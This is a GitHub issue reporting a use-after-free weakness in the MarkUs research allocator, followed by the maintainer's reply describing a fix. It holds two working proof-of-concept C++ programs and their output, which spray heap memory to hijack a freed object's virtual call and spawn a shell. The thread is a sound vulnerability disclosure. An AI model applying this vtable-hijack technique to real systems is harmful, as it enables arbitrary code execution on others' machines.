### ISSUE TITLE
`freeing list` operation leads to exploitable write-after-free

### ISSUE THREAD

**Issue by setuid0x0** [SamAinsworth/MarkUs-sp2020#2]
# The Bug

MarkUs writes an encoded pointer to the quarantined chunk to track the next chunk in the quarantine list.
This can make UAF bugs exploitable without reclaiming the freed chunk since it modifies the contents of the chunk while a dangling pointer to the chunk exists.

For example, An attacker can overwrite a virtual function table for the C++ object by abusing this behavior and spray the memory pointed by the encoded pointer with fake function pointers, and hijack instruction pointer upon virtual function call on the freed object.

# Proof of Concept
(more than 12GB of memory is required to run PoC Code)

PoC Code:
```c++
// g++ -fpermissive test.cpp ; LD_PRELOAD="$HOME/markus-allocator/lib/libgc.so $HOME/markus-allocator/lib/libgccpp.so" ./a.out

#include <unistd.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

class Victim {
   public: virtual void good() { puts("Hello World"); };
};

void evil() {
	puts("spawning shell...");
	execve("/bin/sh", NULL, NULL);
}

int main() {
	auto *a = new Victim;
	auto *b = new Victim;
	printf("a at %p, a.vftable = 0x%lx\n", a, ((uint64_t *)(void *)a)[0]);
	printf("b at %p, b.vftable = 0x%lx\n", b, ((uint64_t *)(void *)b)[0]);
	free(a);
	free(b);
	puts("freed both objs");
	printf("a at %p, a.vftable (corrupted) = 0x%lx\n", a, ((uint64_t *)(void *)a)[0]);

	uint8_t *spray = malloc(0x300000000);
	puts("spraying...");
	for (size_t i = 0; i < 0x300000000; i += 0x1000)
		((uint64_t *)(spray + 0x3de))[i / 8] = (uint64_t)evil;
	printf("spray at %p ~ %p\n", spray, spray + 0x300000000);

	puts("triggering UAF (virtual function call)...");
	a->good();

	return 0;
}
```

Output:
```
a at 0x563c11568ff0, a.vftable = 0x563c0fa0dd78
b at 0x563c11568fe0, b.vftable = 0x563c0fa0dd78
freed both objs
a at 0x563c11568ff0, a.vftable (corrupted) = 0x563ece8a93de
spray at 0x563c115a3000 ~ 0x563f115a3000
triggering UAF (virtual function call)...
spawning shell...
$
```

PoC Code (info leak assumed):
```c++
// g++ -fpermissive test.cpp ; LD_PRELOAD="$HOME/markus-allocator/lib/libgc.so $HOME/markus-allocator/lib/libgccpp.so" ./a.out

#include <unistd.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

class Victim {
   public: virtual void good() { puts("Hello World"); };
};

void evil() {
	puts("spawning shell...");
	execve("/bin/sh", NULL, NULL);
}

int main() {
	auto *a = new Victim;
	auto *b = new Victim;
	printf("a at %p, a.vftable = 0x%lx\n", a, ((uint64_t *)(void *)a)[0]);
	printf("b at %p, b.vftable = 0x%lx\n", b, ((uint64_t *)(void *)b)[0]);
	free(a);
	free(b);
	puts("freed both objs");
	printf("a at %p, a.vftable (corrupted) = 0x%lx\n", a, ((uint64_t *)(void *)a)[0]);

	uint8_t *spray = malloc(0x300000000);
	printf("spray at %p ~ %p\n", spray, spray + 0x300000000);
	
	// assume info leak
	uintptr_t new_vftable = (uintptr_t)b ^ 12345678910;

	if (spray < new_vftable && new_vftable < spray + 0x300000000) {
		// we can control the value since it's in our spray region
		*(uint64_t *)new_vftable = (uint64_t)evil;

		puts("triggering UAF (virtual function call)...");
		a->good();
	}
	else
		puts("ERROR : freelist value not in our spary region. please retry");

	return 0;
}
```

**Comment by SamAinsworth** [comment]
Thanks Jungwon! The xor pattern I use on the free lists isn't intended to be secret, so your assumptions are valid. Instead, it's intended to stop the marking GC from interpreting its own linked list elements as pointers to within the relevant objects, preventing their reclaiming.

I've edited this to make it more direct - the XOR value will now always send the pointer outside the valid pointer region (by XORing with 1ul<<52). That should, I believe, get rid of this particular bug.

More generally, the quarantine list should really be stored out-of-line. We didn't do this in this prototype implementation because we wanted to reuse the Boehm GC's structures, and we were primarily trying to evaluate the cost of a temporally safe allocator rather than provide a full implementation. Modern allocators such as JeMalloc already store their metadata out-of-line, and so the costs are well understood (and effectively zero - JeMalloc is much faster than Boehm).
